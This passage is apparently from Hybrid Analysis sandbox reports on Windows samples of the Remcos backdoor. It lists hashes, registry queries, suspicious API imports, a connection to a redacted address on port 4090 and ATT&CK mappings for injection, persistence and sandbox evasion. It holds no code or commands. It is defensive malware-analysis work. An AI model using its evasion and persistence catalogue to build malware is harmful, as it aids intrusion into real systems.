\"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-193", "relevance": 5, "name": "Calls an API used to change the configuration parameters of a service", "description": "Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" has a section named \".gfids\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"SleepConditionVariableCS\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNEL32.DLL)\n Found string \"FlsAlloc\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"InitOnceExecuteOnce\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNEL32.DLL)\n Found string \"CreateEventExW\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSemaphoreW\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNEL32.DLL)\n Found string \"CreateSemaphoreExW\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolTimer\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolWait\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSymbolicLinkW\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNEL32.DLL)\n Found string \"GetTickCount64\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"GetFileInformationByHandleEx\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNEL32.DLL)\n Found string \"SetFileInformationByHandle\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"SleepConditionVariableSRW\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNEL32.DLL)\n Found string \"CreateThreadpoolWork\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"GetLocaleInfoEx\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNELBASE.DLL)\n Found string \"GetDateFormatEx\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNEL32.DLL)\n Found string \"GetTimeFormatEx\" (Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a, API is part of module: KERNEL32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" has section name .text with entropy \"6.6273936921798455\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" has section name .reloc with entropy \"6.723768218094163\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "stream-40", "type": 1, "relevance": 10, "name": "Looks up many procedures within the same disassembly stream (often used to hide usage)", "description": "Found 40 calls to GetProcAddress@KERNEL32.DLL at 00000000-00005960-4188-2771-00435EED", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" connects to <IPv4> on port 4090 (TCP)", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 4090", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06
https://hybrid-analysis.com/sample/4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06
Hybrid Analysis - Remcos
{"size": 6801, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06", "sha256": "4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06", "av_detect": 7, "vx_family": "Trojan[Backdoor]/Remcos", "threat_score": 5, "threat_level": 3, "verdict": "no verdict", "total_signatures": 6, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27051)", "99 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27051)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)", "33 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "62 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (99 files)"], "total_file_compositions_imports": 321}, "mitre_attcks": [{"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"4b83a33145a7f65d9e0bc816c4b6d8c23635738f4d1d9cd37e9cf3a5888dbd06\" has section name .text with entropy \"6.22030983313\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}]}
329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520
https://hybrid-analysis.com/sample/329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520
Hybrid Analysis - Remcos
{"size": 439808, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520", "sha256": "329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520", "av_detect": 87, "vx_family": "Dump:Generic.Dacic.A9349469.A", "threat_score": 80, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 156, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24247)", "99 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24247)"], "imported_objects": ["23 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "25 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (99 files)"], "total_file_compositions_imports": 289}, "processes": [{"uid": "00000000-00002744", "name": "329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe", "normalized_path": "C:\\329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe", "sha256": "329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": 